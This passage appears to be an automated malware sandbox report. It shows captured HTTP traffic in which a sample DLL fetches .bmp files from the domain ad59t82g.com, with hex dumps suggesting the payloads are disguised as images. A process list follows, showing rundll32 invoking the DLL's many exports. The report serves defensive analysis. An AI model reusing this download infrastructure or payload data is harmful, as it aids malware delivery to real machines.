Dec 27, 2024 06:22:11.681384087 CET	1236	IN	Data Raw: 53 19 43 1d 23 da 6d ee 7b 0f b8 a2 fa c0 3e 9c e3 62 a4 8d 2c b7 ee b1 3c 22 2d 27 04 9c cb fd c1 be df d9 45 90 ff d5 9f f5 85 64 5e b7 95 05 06 f6 df 1f ff e5 88 b7 eb fc d3 cd 1b 04 0b 16 e8 ba 74 0a f3 0f 2b c7 ce dd 22 28 1c ef 0b f5 46 10 Data Ascii: SC#m{>b,<"-'Ed^t+"(FDDzaOP<Y\|e sB-8\|!'/{DIM^2{;SC[,]D@{>&i+~BJ%,W^=\|,Nor_xM[+$6^KjZCO,6~(
Dec 27, 2024 06:22:11.681421041 CET	1120	IN	Data Raw: 9c de 19 c6 23 69 3c b2 2e 00 84 62 de 64 90 6d fb e5 9c 2c 74 3a 56 e0 8e 51 57 3d 61 67 67 68 da ff 49 d2 0f 9e a8 f9 85 13 2f e2 38 03 c3 36 ef 27 f5 8f ba 99 a1 f2 28 82 19 11 5d 6b 4b 4a 6f b3 c2 05 9d 49 42 a8 fd 3b 6a 78 4b e2 0b e6 14 ae Data Ascii: #i<.bdm,t:VQW=agghI/86'(]kKJoIB;jxKPFw<ke/Gxb%.$/}LM[A7gRKh;@'lv"1at@sjC`U{ R/JJ*YO Iq_)]<\\H4y`MN
Dec 27, 2024 06:22:11.681454897 CET	1236	IN	Data Raw: e9 2f 45 bf 94 0c 8d 4c 55 ef e3 1b 9a 76 ed 58 cc 4b d6 99 ca bb 9b 9a 24 8f 6c b9 fd 84 18 06 3d 5d f3 41 85 c5 35 85 01 22 bd 3a d2 f0 3e f9 f8 60 2f 83 e2 66 52 a6 ab b5 01 2c 6b 32 22 08 1c 2e cb c8 5d ef d2 ef e1 92 df be 88 3d 49 48 2e 17 Data Ascii: /ELUvXK$l=]A5":>`/fR,k2".]=IH.d_t)vjmz;SRU;V=>C$;oLFK6%8L$Ii o]Y!oM`{m=Tfghy_=EN:6]
Dec 27, 2024 06:22:11.681489944 CET	1236	IN	Data Raw: 9a e6 4e d7 c6 ad b1 23 13 62 8a d3 d4 d4 a2 3a df 34 79 4a 42 f7 51 15 72 5d 64 b5 78 79 d4 1e 77 48 1d 4c 96 23 b6 6e 88 3d 92 9f 84 18 4a a7 dc 75 15 cd 5d 75 fd 32 75 45 7a c5 8a 64 3a 79 de 9e e8 da 7b 01 70 6f c0 8f eb 65 d1 d2 30 4e ae 03 Data Ascii: N#b:4yJBQr]dxywHL#n=Ju]u2uEzd:y{poe0N)p`ep HSbJ]<hs+c6}u?=S--ACWZCv5)W5W~2CPO2\&a*xp3B5I/
Dec 27, 2024 06:22:11.681710005 CET	1236	IN	Data Raw: 78 52 ca f7 3a 19 af 55 da 4b 8d 3f 1b de d9 8d c9 bc 1a 81 d2 39 5d 55 41 09 2a de 84 1a 1b c3 ad ec 07 96 ed 6e ae b8 31 2e a4 c5 05 30 9e 9a 30 67 cd af 65 26 ed e5 ce 04 d3 80 85 57 22 2f c2 a0 b1 c0 6b 44 ff dc 42 6a 70 ce 80 e4 28 b5 da 2d Data Ascii: xR:UK?9]UA*n1.00ge&W"/kDBjp(-eW%5/L_D.]?QR#B+87V\7~>$}ph3W@(Bl-!;8^c_R3;sx[}m]blvEKUq=XlnTX
Dec 27, 2024 06:22:11.681761980 CET	1236	IN	Data Raw: 70 fd 82 a1 cc ad 45 13 05 80 e9 67 bc e9 01 9f ca 0d ce 7a e2 5d 4b d6 41 74 0b 61 88 69 61 96 f7 b7 1c 51 9f ca 8f 86 32 75 d6 34 75 05 81 bd b7 76 c2 f9 b8 37 f8 89 7f 56 02 66 5f 82 d2 81 8c d5 af 65 78 5f a1 02 94 0b 4c 0b 4b 0d 5f 5b f1 c1 Data Ascii: pEgz]KAtaiaQ2u4uv7Vf_ex_LK_[ "S?\|uKV8gf<}C.of#Zj^?5WOBz62iLB.ei>aSuJ#j_nRN\|
Dec 27, 2024 06:22:11.689654112 CET	1236	IN	Data Raw: 73 2a c0 d6 e8 92 77 06 12 c5 40 37 39 38 24 ae e9 da a2 87 45 0b 9a b1 b9 c4 42 15 8e c5 0e 66 9b 51 26 ea b5 72 75 f8 a0 a2 ee b2 57 d8 c4 ca c7 b6 0a e5 cd 94 eb 5e 77 94 46 60 10 d2 e7 3e 9d d0 5a f7 07 d4 01 91 fe b4 cf 95 45 52 1f 44 68 95 Data Ascii: s*w@798$EBfQ&ruW^wF`>ZERDhD8$}%"G_9B=Hp^bz>A3p86(V9Y?JVmXb?vmLQ/3.~R,OC{^S(3%9nCVtIzw
Dec 27, 2024 06:22:13.595421076 CET	113	OUT	HEAD /2/d.bmp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ad59t82g.com
Dec 27, 2024 06:22:14.077255011 CET	907	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 05:22:13 GMT Content-Type: image/x-ms-bmp Content-Length: 1236598 Connection: keep-alive Last-Modified: Sun, 27 Oct 2024 15:21:40 GMT ETag: "671e5a84-12de76" Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tpjKIMq5riD6k9fp%2FWuJhf8dBGPyvIB44Bi7ED1NVPM6DeR6j23Wrc6PJz5%2Bbg3XcnR4x6V4IlDJmcAV%2F5TzTOC0yi1J%2FjUA68nDwofgVL%2FBj674fIS0EaRBhiT%2BI%2FY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f86df240af77d1e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3324&min_rtt=1971&rtt_var=455&sent=164&recv=19&lost=0&retrans=0&sent_bytes=233731&recv_bytes=344&delivery_rate=59184190&cwnd=336&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 27, 2024 06:22:14.078093052 CET	112	OUT	GET /2/d.bmp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ad59t82g.com
Dec 27, 2024 06:22:14.432019949 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 05:22:14 GMT Content-Type: image/x-ms-bmp Content-Length: 1236598 Connection: keep-alive Last-Modified: Sun, 27 Oct 2024 15:21:40 GMT ETag: "671e5a84-12de76" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 1 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FlBfSf2uqIyXpFIU6zDxYbVddpl4qUiiMYdwA%2BhL3AxBX3cHw5iC%2BkxZot%2FT0n%2FSnb1yQwg0YjXb7KtnacLPSJO0dCAblq3Hll1q%2Btx2%2Fy1qrAd6Mw5qkKhQiBniklk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f86df272e337d1e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5633&min_rtt=1971&rtt_var=4960&sent=166&recv=21&lost=0&retrans=0&sent_bytes=234638&recv_bytes=456&delivery_rate=59184190&cwnd=337&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 42 4d 76 de 12 00 00 00 00 00 36 00 00 00 28 00 00 00 2c 02 00 00 2c 02 00 00 01 00 20 00 00 00 00 00 40 de 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 52 90 00 64 08 00 00 63 08 00 00 98 f7 00 00 df 08 00 00 67 08 00 00 27 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 09 00 00 69 17 ba 0e 67 bc 09 cd 46 b0 01 4c aa 29 54 68 0e 7b 20 70 15 67 67 72 06 65 20 63 06 66 6e 6f 13 28 62 65 47 7a 75 6e 47 61 6e 20 23 47 53 20 0a 67 64 65 49 05 0d 0a 43 08 00 00 67 08 00 00 9a 34 c5 41 de 55 ab 12 de 55 ab 12 de 55 ab 12 b1 23 35 12 ea 55 ab 12 b1 23 01 12 46 55 ab 12 b1 23 00 12 f1 55 ab 12 d7 2d 28 12 dd 55 ab 12 d7 2d 38 12 cf 55 ab 12 de 55 aa 12 01 55 ab 12 b1 23 04 12 ff 55 ab 12 b1 23 30 12 df 55 ab 12 b1 23 31 12 df 55 ab 12 b1 23 36 12 df 55 ab 12 35 61 63 68 de 55 ab 12 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 37 4d 00 00 2b 09 05 00 04 52 1e 67 67 Data Ascii: BMv6(,, @*Rdcg'gggggggggigFL)Th{ pggre cfno(beGzunGan #GS gdeICg4AUUU#5U#FU#U-(U-8UUU#U#0U#1U#6U5achUgggggg7M+Rgg
Dec 27, 2024 06:22:17.907387972 CET	114	OUT	HEAD /2/t1.bmp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ad59t82g.com
Dec 27, 2024 06:22:18.388911963 CET	897	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 05:22:18 GMT Content-Type: image/x-ms-bmp Content-Length: 2487 Connection: keep-alive Last-Modified: Wed, 23 Oct 2024 17:31:56 GMT ETag: "6719330c-9b7" Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pr0pquQUpOfd8Q86NPXE4SHC4EcDtoaO2EJVCfBhKUHvEr%2Bs9aE5X7Rrtp0YG2eKb9UPk5q2b%2BN5VcyB2WcxNqatOERw%2FV8iloR7LM0tNKQ2CtH6D0KzyDMybXLCnwk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f86df3efb967d1e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10003&min_rtt=1971&rtt_var=4184&sent=1026&recv=93&lost=0&retrans=1&sent_bytes=1472796&recv_bytes=570&delivery_rate=79718081&cwnd=457&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 27, 2024 06:22:18.389417887 CET	113	OUT	GET /2/t1.bmp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ad59t82g.com
Dec 27, 2024 06:22:18.721013069 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 05:22:18 GMT Content-Type: image/x-ms-bmp Content-Length: 2487 Connection: keep-alive Last-Modified: Wed, 23 Oct 2024 17:31:56 GMT ETag: "6719330c-9b7" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 0 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T2RY3LEtlhMsLqnD%2Bm5elawtfok20aUJgWzzi0L%2Bc%2F5yhJ%2FC%2B5FHC14Tq0Jc6239GfAelZgzQJUz%2FtzGrsrFw6aLo9QaEIq3RdvLXchaNXSPC5ZD1jtNnNTpI37jQqQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f86df41fa3d7d1e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=11591&min_rtt=1971&rtt_var=6314&sent=1028&recv=95&lost=0&retrans=1&sent_bytes=1473693&recv_bytes=683&delivery_rate=79718081&cwnd=457&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 42 4d de b2 08 00 00 00 00 00 36 00 00 00 28 00 00 00 7a 01 00 00 79 01 00 00 01 00 20 00 00 00 00 00 a8 b2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 83 ec 83 83 f0 81 ec 73 0a 00 00 03 a9 30 00 67 08 53 33 bc 81 5c 24 3b 81 5c 24 17 81 5c 24 13 81 5c 24 1f 83 40 0c ec 48 14 56 30 e3 42 0f d0 40 24 8b 37 20 d1 e9 54 f7 3b cb 19 17 0f b7 55 8b c2 02 e4 f6 61 72 61 89 c6 e0 98 08 00 69 98 29 05 00 67 07 b7 f6 64 f6 49 75 86 89 e7 ff 98 f7 7f 81 98 d8 d1 91 08 07 84 ec 67 08 00 8b 67 33 c3 75 dd 3b f6 53 0f 52 3c 94 24 e0 bf 06 67 08 50 68 11 4f cc 69 ee 4c 24 30 8f b8 06 00 67 f7 74 24 57 81 44 24 5f 60 12 65 f4 4e e8 9e 61 08 00 ff 13 2c 38 89 23 2c 44 68 2e d2 de 2a 8f 84 06 00 67 f7 74 24 27 81 44 24 37 60 0f f5 21 02 e8 7a 61 08 00 89 23 2c 58 83 a3 20 8d 44 43 04 50 c7 23 2c 10 6e 13 6c 6c 66 a0 4c 24 14 0b 08 ff 54 43 20 ff 74 43 28 8b f0 0f 83 2b 8f 6e e0 4b 06 67 08 ff 74 43 20 89 44 43 48 68 e2 36 5e 66 e8 5e 0e 00 00 e4 cc 10 89 23 2c 38 e8 Data Ascii: BM6(zy 2s0gS3\$;\$\$\$@HV0B@$7 T;Uarai)gdIugg3u;SR<$gPhOiL$0gt$WD$_`eNa,8#,Dh.*gt$'D$7`!za#,X DCP#,nllfL$TC tC(+nKgtC DCHh6^f^#,8
Dec 27, 2024 06:22:19.768471003 CET	114	OUT	HEAD /2/t6.bmp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ad59t82g.com
Dec 27, 2024 06:22:20.245400906 CET	899	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 05:22:20 GMT Content-Type: image/x-ms-bmp Content-Length: 2487 Connection: keep-alive Last-Modified: Wed, 23 Oct 2024 16:10:24 GMT ETag: "67191ff0-9b7" Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h5Jhi09HSIe3i%2Fpx6OJlMX6mwITGAMypm5%2Fmvp4s52rRZ0S3y0i9YEZzjmZQxM8VL4FK1m%2BSi2GxgtraGSN0%2FcWzvYeXB5h6LMztJ9aQLxVqflUqPuTdMgjRdmk9Qws%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f86df4a9a427d1e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10407&min_rtt=1971&rtt_var=6413&sent=1032&recv=98&lost=0&retrans=1&sent_bytes=1477090&recv_bytes=797&delivery_rate=79718081&cwnd=457&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 27, 2024 06:22:20.246222973 CET	113	OUT	GET /2/t6.bmp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ad59t82g.com
Dec 27, 2024 06:22:20.584721088 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 05:22:20 GMT Content-Type: image/x-ms-bmp Content-Length: 2487 Connection: keep-alive Last-Modified: Wed, 23 Oct 2024 16:10:24 GMT ETag: "67191ff0-9b7" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 0 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DtFuiP7vdGoCMioEMJ8i9uVNcFTtzAs%2BXvYxR53nl5ljie3OS4ZiTAoh8vZPo2jvjnAOaCz32kpy7h2%2FwAd6L7TQDNJ6TZyCbmrixeMojz8vJxz4Xug1mmCGTLzd8%2Fw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f86df4d9d957d1e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=12302&min_rtt=1971&rtt_var=8599&sent=1034&recv=100&lost=0&retrans=1&sent_bytes=1477989&recv_bytes=910&delivery_rate=79718081&cwnd=457&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 42 4d de b2 08 00 00 00 00 00 36 00 00 00 28 00 00 00 7a 01 00 00 79 01 00 00 01 00 20 00 00 00 00 00 a8 b2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 83 ec 83 83 f0 81 ec 73 0a 00 00 03 a9 30 00 67 08 53 33 bc 81 5c 24 3b 81 5c 24 17 81 5c 24 13 81 5c 24 1f 83 40 0c ec 48 14 56 30 e3 42 0f d0 40 24 8b 37 20 d1 e9 54 f7 3b cb 19 17 0f b7 55 8b c2 02 e4 f6 61 72 61 89 c6 e0 98 08 00 69 98 29 05 00 67 07 b7 f6 64 f6 49 75 86 89 e7 ff 98 f7 7f 81 98 d8 d1 91 08 07 84 ec 67 08 00 8b 67 33 c3 75 dd 3b f6 53 0f 52 3c 94 24 e0 bf 06 67 08 50 68 11 4f cc 69 ee 4c 24 30 8f b8 06 00 67 f7 74 24 57 81 44 24 5f 60 12 65 f4 4e e8 9e 61 08 00 ff 13 2c 38 89 23 2c 44 68 2e d2 de 2a 8f 84 06 00 67 f7 74 24 27 81 44 24 37 60 0f f5 21 02 e8 7a 61 08 00 89 23 2c 58 83 a3 20 8d 44 43 04 50 c7 23 2c 10 6e 13 6c 6c 66 a0 4c 24 14 0b 08 ff 54 43 20 ff 74 43 28 8b f0 0f 83 2b 8f 6e e0 4b 06 67 08 ff 74 43 20 89 44 43 48 68 e2 36 5e 66 e8 5e 0e 00 00 e4 cc 10 89 23 2c 38 e8 4e 0e 00 00 54 Data Ascii: BM6(zy 2s0gS3\$;\$\$\$@HV0B@$7 T;Uarai)gdIugg3u;SR<$gPhOiL$0gt$WD$_`eNa,8#,Dh.*gt$'D$7`!za#,X DCP#,nllfL$TC tC(+nKgtC DCHh6^f^#,8NT

Target ID:	0
Start time:	00:21:57
Start date:	27/12/2024
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll"
Imagebase:	0x6e0000
File size:	126'464 bytes
MD5 hash:	51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	1
Start time:	00:21:57
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	2
Start time:	00:21:57
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",#1
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	00:21:57
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_clear_cross_origin_whitelist
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	00:21:57
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",#1
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	00:22:00
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_clear_scheme_handler_factories
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	00:22:03
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_command_line_create
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	00:22:06
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_clear_cross_origin_whitelist
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	8
Start time:	00:22:06
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_clear_scheme_handler_factories
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	9
Start time:	00:22:06
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_command_line_create
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	10
Start time:	00:22:06
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",you
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	11
Start time:	00:22:06
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",create_context_shared
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	12
Start time:	00:22:06
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_zip_reader_create
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	13
Start time:	00:22:06
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_zip_directory
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	14
Start time:	00:22:06
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_write_json
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	15
Start time:	00:22:06
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_window_create_top_level
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	16
Start time:	00:22:06
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_visit_web_plugin_info
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	17
Start time:	00:22:06
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_value_create
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	18
Start time:	00:22:06
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_undefined
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	19
Start time:	00:22:06
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_uint
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	20
Start time:	00:22:06
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_string
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	21
Start time:	00:22:06
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_object
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	22
Start time:	00:22:06
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_null
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	23
Start time:	00:22:07
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_int
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	24
Start time:	00:22:07
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_function
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	25
Start time:	00:22:07
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_double
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
